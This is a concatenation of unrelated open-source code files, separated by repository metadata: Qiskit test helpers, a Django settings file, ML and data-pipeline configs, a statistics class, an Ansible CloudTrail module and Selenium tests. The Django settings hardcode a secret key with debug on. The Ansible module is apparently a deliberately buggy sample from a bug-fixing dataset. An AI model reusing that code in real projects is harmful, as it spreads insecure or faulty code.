from qiskit import __path__ as qiskit_path
class Path(Enum):
"""Helper with paths commonly used during the tests."""
# Main SDK path: qiskit/
SDK = qiskit_path[0]
# test.python path: qiskit/test/python/
TEST = os.path.normpath(os.path.join(SDK, '..', 'test', 'python'))
# Examples path: examples/
EXAMPLES = os.path.normpath(os.path.join(SDK, '..', 'examples'))
# Schemas path: qiskit/schemas
SCHEMAS = os.path.normpath(os.path.join(SDK, 'schemas'))
# Sample QASMs path: qiskit/test/python/qasm
QASMS = os.path.normpath(os.path.join(TEST, 'qasm'))
def setup_test_logging(logger, log_level, filename):
"""Set logging to file and stdout for a logger.
Args:
logger (Logger): logger object to be updated.
log_level (str): logging level.
filename (str): name of the output file.
"""
# Set up formatter.
log_fmt = ('{}.%(funcName)s:%(levelname)s:%(asctime)s:'
' %(message)s'.format(logger.name))
formatter = logging.Formatter(log_fmt)
# Set up the file handler.
file_handler = logging.FileHandler(filename)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
if os.getenv('STREAM_LOG'):
# Set up the stream handler.
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
# Set the logging level from the environment variable, defaulting
# to INFO if it is not a valid level.
level = logging._nameToLevel.get(log_level, logging.INFO)
logger.setLevel(level)
class _AssertNoLogsContext(unittest.case._AssertLogsContext):
"""A context manager used to implement TestCase.assertNoLogs()."""
# pylint: disable=inconsistent-return-statements
def __exit__(self, exc_type, exc_value, tb):
"""
This is a modified version of TestCase._AssertLogsContext.__exit__(...)
"""
self.logger.handlers = self.old_handlers
self.logger.propagate = self.old_propagate
self.logger.setLevel(self.old_level)
if exc_type is not None:
# let unexpected exceptions pass through
return False
if self.watcher.records:
msg = 'logs of level {} or higher triggered on {}:\n'.format(
logging.getLevelName(self.level), self.logger.name)
for record in self.watcher.records:
msg += 'logger %s %s:%i: %s\n' % (record.name, record.pathname,
record.lineno,
record.getMessage())
self._raiseFailure(msg)
class Case(dict):
"""<no description>"""
pass
def generate_cases(docstring, dsc=None, name=None, **kwargs):
"""Combines kwargs in cartesian product and creates Case with them"""
ret = []
keys = kwargs.keys()
vals = kwargs.values()
for values in product(*vals):
case = Case(zip(keys, values))
if docstring is not None:
setattr(case, "__doc__", docstring.format(**case))
if dsc is not None:
setattr(case, "__doc__", dsc.format(**case))
if name is not None:
setattr(case, "__name__", name.format(**case))
ret.append(case)
return ret
| [
"vinfinitysailor@gmail.com"
] | vinfinitysailor@gmail.com |
c27e540e1dee4537be8ca6378dc757a16a9ff8d0 | 801510e45d9aebe5c5b8b09a3ce4453a3a11a3ca | /django/full_stack_django/amadon/amadon/settings.py | c8a2b95ae4b1da6df15ff14bd3426de162c50844 | [] | no_license | michelleshan/coding_dojo_python_course | 5581ebca0a645ba7231a2da2d2d64d6c3735bfc4 | e20e8195950004ef0aa09e6b0f84e7f05bd355e8 | refs/heads/master | 2022-11-21T01:34:54.309175 | 2020-07-16T03:29:45 | 2020-07-16T03:29:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,103 | py | """
Django settings for amadon project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '^y#+bl%#tl6dws0l$moo_3o-su_^kjym5l*x!+!dlrhvv#m$+h'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'amadon_app'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'amadon.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'amadon.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
| [
"michellehan@Michelles-Air.attlocal.net"
] | michellehan@Michelles-Air.attlocal.net |
261a0e0bb3133e20df3e76e1fdd109448d018b8c | 9ef7093ffa3bbb916e197ba6788aa3c13dc034dd | /configs/underwaterdataset/reppoints_moment_r50_fpn_2x_mt.py | a03ed5bd5954ecf0b1fa1cdec5e5f447f67c00c3 | [
"Apache-2.0"
] | permissive | coldsummerday/mmdetection-zhou | aae3b50ecddf227f0802c2e5b51622168714fab5 | c333f06f4ffb22131a6f30e6468c82b926e5c87f | refs/heads/master | 2020-12-10T07:34:49.813269 | 2020-03-10T08:52:10 | 2020-03-10T08:52:10 | 233,536,042 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,428 | py | # model settings
norm_cfg = dict(type='GN', num_groups=32, requires_grad=True)
model = dict(
type='RepPointsDetector',
pretrained='torchvision://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
start_level=1,
add_extra_convs=True,
num_outs=5,
norm_cfg=norm_cfg),
bbox_head=dict(
type='RepPointsHead',
num_classes=5,
in_channels=256,
feat_channels=256,
point_feat_channels=256,
stacked_convs=3,
num_points=9,
gradient_mul=0.1,
point_strides=[8, 16, 32, 64, 128],
point_base_scale=4,
norm_cfg=norm_cfg,
loss_cls=dict(
type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
loss_bbox_init=dict(type='SmoothL1Loss', beta=0.11, loss_weight=0.5),
loss_bbox_refine=dict(type='SmoothL1Loss', beta=0.11, loss_weight=1.0),
transform_method='moment'))
# training and testing settings
train_cfg = dict(
init=dict(
assigner=dict(type='PointAssigner', scale=4, pos_num=1),
allowed_border=-1,
pos_weight=-1,
debug=False),
refine=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.4,
min_pos_iou=0,
ignore_iof_thr=-1),
allowed_border=-1,
pos_weight=-1,
debug=False))
test_cfg = dict(
nms_pre=1000,
min_bbox_size=0,
score_thr=0.05,
nms=dict(type='nms', iou_thr=0.5),
max_per_img=100)
# dataset settings
dataset_type = 'UnderWaterDataset'
data_root = '/home/ices18/data/underwaterobjectdetection/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(
type='Resize',
img_scale=[(1333, 480), (1333, 960)],
keep_ratio=True,
multiscale_mode='range'),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=4,
workers_per_gpu=2,
train=dict(
type=dataset_type,
data_root = data_root,
ann_file=data_root + 'trainannotation.pkl',
img_prefix=data_root + 'train/image/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
data_root = data_root,
ann_file=data_root + 'trainannotation.pkl',
img_prefix=data_root + 'train/image/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
data_root = data_root,
ann_file=data_root + 'trainannotation.pkl',
img_prefix=data_root + 'train/image/',
pipeline=test_pipeline))
evaluation = dict(interval=1, metric='bbox')
# optimizer
optimizer = dict(type='SGD', lr=0.0025, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[16, 22])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 24
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/reppoints_moment_r50_fpn_2x_mt'
load_from = None
resume_from = None
auto_resume = True
workflow = [('train', 1)]
| [
"2808972009@qq.com"
] | 2808972009@qq.com |
0c808994fa59f2de1512003d66c1b90c255c8e86 | 147648c6b25ecc33e82a36b36de6623df9340e62 | /examples/docs_snippets/docs_snippets/legacy/dagster_pandas_guide/shape_constrained_trip.py | 919727954440fecaff0a49b7ac4c1ac7266f5a30 | [
"Apache-2.0"
] | permissive | asdlei99/dagster | be81009ff00dbad02f7cec974650388a5cc2af59 | bbfd1a22e85a10881d7dbbcc888957a487f0c3e5 | refs/heads/master | 2023-08-28T07:18:23.838943 | 2021-11-08T23:09:07 | 2021-11-08T23:09:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 820 | py | from datetime import datetime
from dagster import Out, job, op
from dagster.utils import script_relative_path
from dagster_pandas import RowCountConstraint, create_dagster_pandas_dataframe_type
from pandas import DataFrame, read_csv
# start_create_type
ShapeConstrainedTripDataFrame = create_dagster_pandas_dataframe_type(
name="ShapeConstrainedTripDataFrame", dataframe_constraints=[RowCountConstraint(4)]
)
# end_create_type
@op(out=Out(ShapeConstrainedTripDataFrame))
def load_shape_constrained_trip_dataframe() -> DataFrame:
return read_csv(
script_relative_path("./ebike_trips.csv"),
parse_dates=["start_time", "end_time"],
date_parser=lambda x: datetime.strptime(x, "%Y-%m-%d %H:%M:%S.%f"),
)
@job
def shape_constrained_trip():
load_shape_constrained_trip_dataframe()
| [
"noreply@github.com"
] | asdlei99.noreply@github.com |
02f6ddcfd40e620fba1b316addc8157b0fccbf16 | 8a74a679fd53fa909d4cc7221d477ce21a1c3566 | /PYTHON/remove_duplicates.py | e5dae22358ca2965e82c5cf9443a3104ca841f0f | [
"MIT"
] | permissive | pawarspeaks/HACKTOBERFEST2021-2 | 1082245d10d1bd76a4b9900223e701ab95b881e8 | 1b53ba18b78d489c2b13d331d70e35e8a8566e93 | refs/heads/main | 2023-09-01T11:11:05.310810 | 2021-10-30T16:20:42 | 2021-10-30T16:20:42 | 422,931,347 | 4 | 0 | MIT | 2021-10-30T16:20:06 | 2021-10-30T16:20:05 | null | UTF-8 | Python | false | false | 599 | py | # Question Link : https://leetcode.com/problems/remove-duplicates-from-sorted-list/
class Solution:
def deleteDuplicates(self, head: Optional[ListNode]) -> Optional[ListNode]:
prev = head
current = head
if head:
val = head.val
head = head.next
while (head != None):
if head.val == val:
prev.next = head.next
head = head.next
else:
val = head.val
prev = head
head = head.next
return current
| [
"noreply@github.com"
] | pawarspeaks.noreply@github.com |
05877846d04c4a9261d06974e881b4c047c5ef65 | ee4d59c295d3060077f5dc3e35aaf0458b31eb32 | /Main/VideoFilter/ConvolutionFiltering/BlurAvgApi.py | 95c97dd9fbeae3b5295c9e3a2bc9194bb5231df4 | [] | no_license | GeonwooVincentKim/Python_OpenCV_MiniProject | eb82f9102352f0fc809c05eeaddbceffaf4e1313 | c59f99ba74a07e6b2b442bf95b90f041f42d2521 | refs/heads/master | 2023-04-22T14:33:41.219214 | 2021-04-20T12:18:34 | 2021-04-20T12:18:34 | 298,581,249 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 282 | py | import cv2
import numpy as np
file_name = '../../../img/taekwonv1.jpg'
img = cv2.imread(file_name)
blur1 = cv2.blur(img, (10, 10))
blur2 = cv2.boxFilter(img, -1, (10, 10))
merged = np.hstack((img, blur1, blur2))
cv2.imshow('blur', merged)
cv2.waitKey(0)
cv2.destroyAllWindows()
| [
"kdsnop@gmail.com"
] | kdsnop@gmail.com |
7f93cd2bf483be0a0bf39ca8ca709c19d84c5988 | 3b504a983f1807ae7c5af51078bfab8c187fc82d | /client/gui/HUD2/features/BattleReplay/BattleReplayModel.py | d21709f49d792212b7e0c0469bd4dca973d7509b | [] | no_license | SEA-group/wowp_scripts | 7d35fd213db95ea6b3dbd1ec6d3e0f13de86ba58 | 2fe54a44df34f2dcaa6860a23b835dcd8dd21402 | refs/heads/master | 2021-09-07T23:10:13.706605 | 2018-03-02T17:23:48 | 2018-03-02T17:23:48 | 117,280,141 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 649 | py | # Embedded file name: scripts/client/gui/HUD2/features/BattleReplay/BattleReplayModel.py
from gui.HUD2.core.AutoFilledDataModel import AutoFilledDataModel
from gui.HUD2.core.DataModel import Structure, FloatT, BoolT, StringT
from gui.HUD2.features.BattleReplay.BattleReplayController import BattleReplayController
from gui.HUD2.features.BattleReplay.BattleReplaySource import BattleReplaySource
class BattleReplayModel(AutoFilledDataModel):
DATA_SOURCE = BattleReplaySource
CONTROLLER = BattleReplayController
SCHEME = Structure(panelVisibility=BoolT, speed=StringT, isPaused=BoolT, timeMax=FloatT, timeCurrent=FloatT)
source = None | [
"55k@outlook.com"
] | 55k@outlook.com |
1919b311e39568cc7ff40ef676dad61a16346bb4 | 10e1d1ec2eb7d1ff991d4286006dbbaa5a5e1760 | /dist/src/dists/logdagum.py | 4c1d97a901cf2c449eb0e094a7f17cded07d0f12 | [] | no_license | mudkip201/distributions | dd904d462fedf97012ed8057244b0ac496392352 | dc8b6e3a6b59c1552c9726f760b047eaff3f32ef | refs/heads/master | 2020-11-29T15:23:21.580157 | 2017-11-20T20:40:29 | 2017-11-20T20:40:29 | 87,482,965 | 1 | 0 | null | 2017-07-19T17:11:47 | 2017-04-06T23:06:26 | Python | UTF-8 | Python | false | false | 2,121 | py | '''
Created on Jul 18, 2017
@author: matthewcowen-green
'''
import dists.Distribution.Distribution as Distribution
import dists.Distribution as ds
import math
import scipy.special as sp
class logdagum(Distribution):
@staticmethod
def pdf(b,d,l,x):
return b*l*d*math.exp(-d*x)*math.pow(1+l*math.exp(-d*x),-b-1)
@staticmethod
def cdf(b,d,l,x):
return math.pow(1+l*math.exp(-d*x),-b)
@staticmethod
def random(b,d,l):
u=ds.rg0()
return math.log(l/(math.pow(u,-1/b)-1))/d
@staticmethod
def mean(b,d,l):
return (math.log(l)+sp.digamma(b)-sp.digamma(1))/d
@staticmethod
def median(b,d,l):
return math.log(l/(math.pow(1/2,-1/b)-1))/d
@staticmethod
def mode(b,d,l):
if(b*d>1):
return math.log(l*b)/d
return None
@staticmethod
def variance(b,d,l):
return ((sp.polygamma(3,b)+sp.polygamma(3,1))+math.pow(logdagum.mean(b,d,l),2))/math.pow(d,2)-math.pow(logdagum.mean(b,d,l),2)
@staticmethod
def stddev(b,d,l):
return math.sqrt(logdagum.variance(b,d,l))
@staticmethod
def kurtosis(b,d,l):
e1=sp.polygamma(5,b)+sp.polygamma(5,1)
e2=3*(sp.polygamma(3,b)+sp.polygamma(3,1))**2
e3=4*(math.log(l)+sp.digamma(b)-sp.digamma(1))*(sp.polygamma(4,b)-sp.polygamma(4,1))
e4=6*(math.log(l)+sp.digamma(b)-sp.digamma(1))**2*(sp.polygamma(3,b)+sp.polygamma(3,1))
e5=(math.log(l)+sp.digamma(b)-sp.digamma(1))**4
return (e1+e2+e3+e4+e5)/(d**4)/logdagum.variance(b,d,l)**2
@staticmethod
def entropy():
pass
@staticmethod
def skewness(b,d,l):
e1=sp.polygamma(4,b)-sp.polygamma(4,1)
e2=math.pow(math.log(l)+sp.digamma(b)-sp.digamma(1),3)
e3=3*(math.log(l)+sp.digamma(b)-sp.digamma(1))*(sp.polygamma(3,b)+sp.polygamma(3,1))
return ((e1+e2+e3)/(d**3)-3*logdagum.mean(b,d,l)*logdagum.variance(b,d,l)-logdagum.mean(b,d,l)**3)/logdagum.stddev(b,d,l)**3
@staticmethod
def ppf(b,d,l,q):
return math.log(l/(math.pow(q,-1/b)-1))/d
@staticmethod
def mle():
pass | [
"mudkipcg@yahoo.om"
] | mudkipcg@yahoo.om |
a528126e75a4f20eaadf3ed8b12152ba16d83163 | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-1/92b3d792837f65e6264ce4b4a4fb1459dad94a6e-<main>-bug.py | 5bbb64f1f31e353b094838ed127dd869876130a3 | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,787 | py |
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(state=dict(default='present', choices=['present', 'absent', 'enabled', 'disabled']), name=dict(default='default'), enable_logging=dict(default=True, type='bool'), s3_bucket_name=dict(), s3_key_prefix=dict(), sns_topic_name=dict(), is_multi_region_trail=dict(default=False, type='bool'), enable_log_file_validation=dict(default=False, type='bool', aliases=['log_file_validation_enabled']), include_global_events=dict(default=True, type='bool', aliases=['include_global_service_events']), cloudwatch_logs_role_arn=dict(), cloudwatch_logs_log_group_arn=dict(), kms_key_id=dict(), tags=dict(default={
}, type='dict')))
required_if = [('state', 'present', ['s3_bucket_name']), ('state', 'enabled', ['s3_bucket_name'])]
required_together = [('cloudwatch_logs_role_arn', 'cloudwatch_logs_log_group_arn')]
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True, required_together=required_together, required_if=required_if)
if (not HAS_BOTO3):
module.fail_json(msg='boto3 is required for this module')
if (module.params['state'] in ('present', 'enabled')):
state = 'present'
elif (module.params['state'] in ('absent', 'disabled')):
state = 'absent'
tags = module.params['tags']
enable_logging = module.params['enable_logging']
ct_params = dict(Name=module.params['name'], S3BucketName=module.params['s3_bucket_name'], IncludeGlobalServiceEvents=module.params['include_global_events'], IsMultiRegionTrail=module.params['is_multi_region_trail'], EnableLogFileValidation=module.params['enable_log_file_validation'], S3KeyPrefix='', SnsTopicName='', CloudWatchLogsRoleArn='', CloudWatchLogsLogGroupArn='', KmsKeyId='')
if module.params['s3_key_prefix']:
ct_params['S3KeyPrefix'] = module.params['s3_key_prefix'].rstrip('/')
if module.params['sns_topic_name']:
ct_params['SnsTopicName'] = module.params['sns_topic_name']
if module.params['cloudwatch_logs_role_arn']:
ct_params['CloudWatchLogsRoleArn'] = module.params['cloudwatch_logs_role_arn']
if module.params['cloudwatch_logs_log_group_arn']:
ct_params['CloudWatchLogsLogGroupArn'] = module.params['cloudwatch_logs_log_group_arn']
if module.params['kms_key_id']:
ct_params['KmsKeyId'] = module.params['kms_key_id']
try:
(region, ec2_url, aws_connect_params) = get_aws_connection_info(module, boto3=True)
client = boto3_conn(module, conn_type='client', resource='cloudtrail', region=region, endpoint=ec2_url, **aws_connect_params)
except ClientError as err:
module.fail_json(msg=err.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(err.response))
results = dict(changed=False, exists=False)
trail = get_trail_facts(module, client, ct_params['Name'])
if (trail is not None):
results['exists'] = True
if ((state == 'absent') and results['exists']):
results['changed'] = True
results['exists'] = False
results['trail'] = dict()
if (not module.check_mode):
delete_trail(module, client, trail['TrailARN'])
elif ((state == 'present') and results['exists']):
do_update = False
for key in ct_params:
tkey = str(key)
if (key == 'EnableLogFileValidation'):
tkey = 'LogFileValidationEnabled'
if (ct_params.get(key) == ''):
val = None
else:
val = ct_params.get(key)
if (val != trail.get(tkey)):
do_update = True
results['changed'] = True
if module.check_mode:
trail.update({
tkey: ct_params.get(key),
})
if ((not module.check_mode) and do_update):
update_trail(module, client, ct_params)
trail = get_trail_facts(module, client, ct_params['Name'])
if (enable_logging and (not trail['IsLogging'])):
results['changed'] = True
trail['IsLogging'] = True
if (not module.check_mode):
set_logging(module, client, name=ct_params['Name'], action='start')
if ((not enable_logging) and trail['IsLogging']):
results['changed'] = True
trail['IsLogging'] = False
if (not module.check_mode):
set_logging(module, client, name=ct_params['Name'], action='stop')
tag_dry_run = False
if module.check_mode:
tag_dry_run = True
tags_changed = tag_trail(module, client, tags=tags, trail_arn=trail['TrailARN'], curr_tags=trail['tags'], dry_run=tag_dry_run)
if tags_changed:
results['changed'] = True
trail['tags'] = tags
results['trail'] = camel_dict_to_snake_dict(trail)
elif ((state == 'present') and (not results['exists'])):
results['changed'] = True
if (not module.check_mode):
created_trail = create_trail(module, client, ct_params)
tag_trail(module, client, tags=tags, trail_arn=created_trail['TrailARN'])
try:
status_resp = client.get_trail_status(Name=created_trail['Name'])
except ClientError as err:
module.fail_json(msg=err.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(err.response))
if (enable_logging and (not status_resp['IsLogging'])):
set_logging(module, client, name=ct_params['Name'], action='start')
if ((not enable_logging) and status_resp['IsLogging']):
set_logging(module, client, name=ct_params['Name'], action='stop')
trail = get_trail_facts(module, client, ct_params['Name'])
if module.check_mode:
acct_id = '123456789012'
try:
sts_client = boto3_conn(module, conn_type='client', resource='sts', region=region, endpoint=ec2_url, **aws_connect_params)
acct_id = sts_client.get_caller_identity()['Account']
except ClientError:
pass
trail = dict()
trail.update(ct_params)
trail['LogFileValidationEnabled'] = ct_params['EnableLogFileValidation']
trail.pop('EnableLogFileValidation')
fake_arn = ((((('arn:aws:cloudtrail:' + region) + ':') + acct_id) + ':trail/') + ct_params['Name'])
trail['HasCustomEventSelectors'] = False
trail['HomeRegion'] = region
trail['TrailARN'] = fake_arn
trail['IsLogging'] = enable_logging
trail['tags'] = tags
results['trail'] = camel_dict_to_snake_dict(trail)
module.exit_json(**results)
| [
"dg1732004@smail.nju.edu.cn"
] | dg1732004@smail.nju.edu.cn |
52cfaa859b7fc79c6e21e658da2d2c8e37299b9f | 55942d2d44f293bc05351a7c9836eb67c9acf5f6 | /ecommerce/user_model/migrations/0006_auto_20190201_2041.py | 6a9dba631afd1623f9823c7a2848bc174c907b98 | [] | no_license | Maheshwari2604/ecommerce | 92c789524b7042def9621839cfe7e83776561814 | 1f58e23adb1185dee774bd90f793e0be3d4ad53f | refs/heads/master | 2020-04-18T17:48:52.480108 | 2019-02-02T08:43:10 | 2019-02-02T08:43:10 | 167,665,723 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,369 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2019-02-01 20:41
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('user_model', '0005_register_model_verified'),
]
operations = [
migrations.CreateModel(
name='address',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('city', models.CharField(max_length=30)),
('service_area', models.CharField(max_length=100)),
('local_address', models.CharField(max_length=200)),
('pin', models.PositiveIntegerField()),
('updated', models.DateTimeField(auto_now=True)),
],
),
migrations.RenameField(
model_name='register_model',
old_name='email_confirmed',
new_name='email_verified',
),
migrations.RemoveField(
model_name='register_model',
name='verified',
),
migrations.AddField(
model_name='address',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='user_model.register_model'),
),
]
| [
"maheshwarishivam2604@gmail.com"
] | maheshwarishivam2604@gmail.com |
19262e47b10b332431050c327993066170f36ffe | 763ca657487d349e57fb2e2753c9ee6d930043e8 | /djusagi/bin/aliases.py | 63d8d9092ccc59747a22d73e664755a6b871cf15 | [
"MIT"
] | permissive | carthage-college/django-djusagi | b680728ab292ab427e9b95fbb8f8a8de232a6809 | ff890b270a9d21b9130068d69df680e5cf5e04ee | refs/heads/master | 2023-04-07T09:13:08.719663 | 2023-03-28T14:08:43 | 2023-03-28T14:08:43 | 41,050,821 | 0 | 0 | MIT | 2023-03-13T21:42:05 | 2015-08-19T17:57:56 | Python | UTF-8 | Python | false | false | 2,244 | py | # -*- coding: utf-8 -*-
import sys
# env
sys.path.append('/usr/local/lib/python2.7/dist-packages/')
sys.path.append('/usr/lib/python2.7/dist-packages/')
sys.path.append('/usr/lib/python2.7/')
from django.conf import settings
from djusagi.core.utils import get_cred
from googleapiclient.discovery import build
import argparse
import httplib2
"""
Fetch all users from the Google API for a given domain
and check for aliases
"""
# set up command-line options
desc = """
Obtain all aliases from all users in the domain
"""
EMAIL = settings.DOMAIN_SUPER_USER_EMAIL
parser = argparse.ArgumentParser(description=desc)
parser.add_argument(
"--test",
action='store_true',
help="Dry run?",
dest="test"
)
def main():
"""
main function
"""
credentials = get_cred(EMAIL, "admin.directory.user")
http = httplib2.Http()
service = build(
"admin", "directory_v1", http=credentials.authorize(http)
)
user_list = []
page_token = None
while True:
results = service.users().list(
domain=EMAIL.split('@')[1],
maxResults=100,
pageToken=page_token,
orderBy='familyName', viewType='domain_public'
).execute(num_retries=10)
for r in results["users"]:
user_list.append(r)
page_token = results.get('nextPageToken')
if not page_token:
break
for user in user_list:
pmail = user.get('primaryEmail')
if pmail:
aliases = service.users().aliases().list(userKey=pmail).execute(
num_retries=10
)
if aliases and aliases.get('aliases'):
for alias in aliases.get('aliases'):
if alias.get('alias'):
print('{}|{}|{}|{}'.format(
user.get('name').get('familyName'),
user.get('name').get('givenName'),
user.get('primaryEmail'), alias.get('alias')
))
######################
# shell command line
######################
if __name__ == "__main__":
args = parser.parse_args()
test = args.test
if test:
print(args)
sys.exit(main())
| [
"plungerman@gmail.com"
] | plungerman@gmail.com |
c26b1e698d6b28cb8ba41501b866f0a0d5697daf | 85ab389658b2fbbb0e56f35e90df35ffb7b3c6dd | /UI_Automation/Tests/test_A_HomePage.py | bdf3d6557013817996f3552a0796fb977186bae4 | [] | no_license | akashgkrishnan/Fm_Staging_automation | 0a306ba0d931db450e3156cdbe8111f63d214889 | 5e8903226ebaa4d512f4f9c9fa581c0d8e227726 | refs/heads/master | 2023-05-13T05:56:02.831480 | 2020-06-03T07:11:26 | 2020-06-03T07:11:26 | 263,627,594 | 0 | 0 | null | 2021-06-02T01:50:17 | 2020-05-13T12:46:34 | Python | UTF-8 | Python | false | false | 6,056 | py | from _csv import reader
from random import randint
from csv import writer
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from UI_Automation.pageObjects.EmployerHome import EmployerHome
from UI_Automation.pageObjects.EmployerSignUp import EmployerSignUp
from UI_Automation.pageObjects.FmContactPage import FmContactPage
from UI_Automation.pageObjects.FmHomeEmployer import FmEmployerPage
from UI_Automation.pageObjects.FmHomePage import FmHomePage
from UI_Automation.pageObjects.EmployerSignInPage import SignInPage
from UI_Automation.utilities.BaseClass import BaseClass
from time import sleep
class TestFmHomePage(BaseClass):
def random_mobile(self):
return randint(1111111111, 5555555555)
def test_employer_FM_home(self):
home_page = FmHomePage(self.driver)
home_page.get_employer().click()
employer_intro = FmEmployerPage(self.driver)
employer_intro.get_request_demo().click()
sleep(2)
employer_intro.get_name_field().send_keys('Akash G Krishnan')
employer_intro.get_email_field().send_keys('akash.k@oneassist.in')
employer_intro.get_phone_field().send_keys('8130233807')
employer_intro.get_company_field().send_keys('KRISHNAN')
employer_intro.get_company_website_field().send_keys('www.google.co.in')
employer_intro.get_submit_demo().click()
sleep(7)
def test_contact_page(self):
home_page = FmHomePage(self.driver)
home_page.get_contact().click()
WebDriverWait(self.driver, 10).until(
EC.presence_of_element_located((By.XPATH, '//h1[contains(text(),"Hello!")]'))
)
contact_page = FmContactPage(self.driver)
contact_page.get_name_field().send_keys("Akash G Krishnan")
contact_page.get_company_field().send_keys("KRISHNAN")
mobile = self.random_mobile()
contact_page.get_email_field().send_keys(str(mobile) + '@mailinator.com')
contact_page.get_phone_field().send_keys(mobile)
contact_page.get_query_field().send_keys('test script run using selenium web driver api. test script run using selenium web driver api.')
contact_page.get_submit_btn().click()
sleep(5)
assert contact_page.get_success_text().text == 'Thank You!'
def test_interviewer_landing(self):
home_page = FmHomePage(self.driver)
home_page.get_interviewer().click()
sleep(3)
def test_employer_signUp(self):
